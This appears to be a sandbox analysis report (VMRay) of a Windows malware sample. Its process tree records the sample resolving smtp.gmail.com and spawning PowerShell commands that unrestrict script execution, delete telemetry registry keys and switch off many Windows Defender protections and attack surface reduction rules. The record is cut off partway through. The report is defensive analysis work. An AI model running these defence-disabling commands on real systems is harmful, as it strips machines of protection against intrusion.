VMRay Analyzer Report for Sample #1664761
VMRay Analyzer
3.2.2
URI
smtp.gmail.com
Resolved_To
Address
74.125.205.109
Process
1
4464
vinfk.exe
1376
vinfk.exe
"C:\Users\FD1HVy\Desktop\vinfk.exe"
C:\Users\FD1HVy\Desktop\
c:\users\fd1hvy\desktop\vinfk.exe
Child_Of
Created
Process
3
4068
vinfk.exe
4464
vinfk.exe
"C:\Users\FD1HVy\Desktop\vinfk.exe"
C:\Users\FD1HVy\Desktop\
c:\users\fd1hvy\desktop\vinfk.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Created
Process
4
2512
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell $ErrorActionPreference = 'SilentlyContinue'
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
5
3516
powershell.exe
2512
powershell.exe
powershell $ErrorActionPreference = 'SilentlyContinue'
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
6
4488
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-ExecutionPolicy -Scope Process -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
7
4476
powershell.exe
4488
powershell.exe
powershell Set-ExecutionPolicy -Scope Process -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
8
5096
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
9
952
powershell.exe
5096
powershell.exe
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
10
900
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
11
2592
powershell.exe
900
powershell.exe
powershell Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Unrestricted -force
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
12
4944
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
13
840
powershell.exe
4944
powershell.exe
powershell reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
14
4004
reg.exe
840
reg.exe
"C:\WINDOWS\system32\reg.exe" delete HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\reg.exe
Opened
Opened
Deleted
Process
15
1088
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
16
2288
powershell.exe
1088
powershell.exe
powershell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
17
2616
reg.exe
2288
reg.exe
"C:\WINDOWS\system32\reg.exe" delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\reg.exe
Opened
Opened
Process
18
2636
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /v DiagTrackAuthorization /t REG_DWORD /d 0 /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
19
3804
powershell.exe
2636
powershell.exe
powershell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /v DiagTrackAuthorization /t REG_DWORD /d 0 /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
20
3428
reg.exe
3804
reg.exe
"C:\WINDOWS\system32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack /v DiagTrackAuthorization /t REG_DWORD /d 0 /f
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\reg.exe
Opened
Created
Process
21
3692
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
22
3544
powershell.exe
3692
powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
23
3716
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
24
3256
powershell.exe
3716
powershell.exe
powershell Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
25
4884
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
26
3364
powershell.exe
4884
powershell.exe
powershell Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
27
5004
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
28
4904
powershell.exe
5004
powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
29
1260
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
30
5040
powershell.exe
1260
powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
31
4004
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
32
4968
powershell.exe
4004
powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
33
4632
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
34
4584
powershell.exe
4632
powershell.exe
powershell Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
35
4612
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
36
4916
powershell.exe
4612
powershell.exe
powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
37
4376
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
38
3460
powershell.exe
4376
powershell.exe
powershell Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
39
2304
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Process
40
1944
powershell.exe
2304
powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
41
3600
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
42
3632
powershell.exe
3600
powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
43
3416
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
44
3356
powershell.exe
3416
powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
45
3572
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
46
3984
powershell.exe
3572
powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids C1DB55AB-C21A-4637-BB3F-A12568109D35 -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
47
3720
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
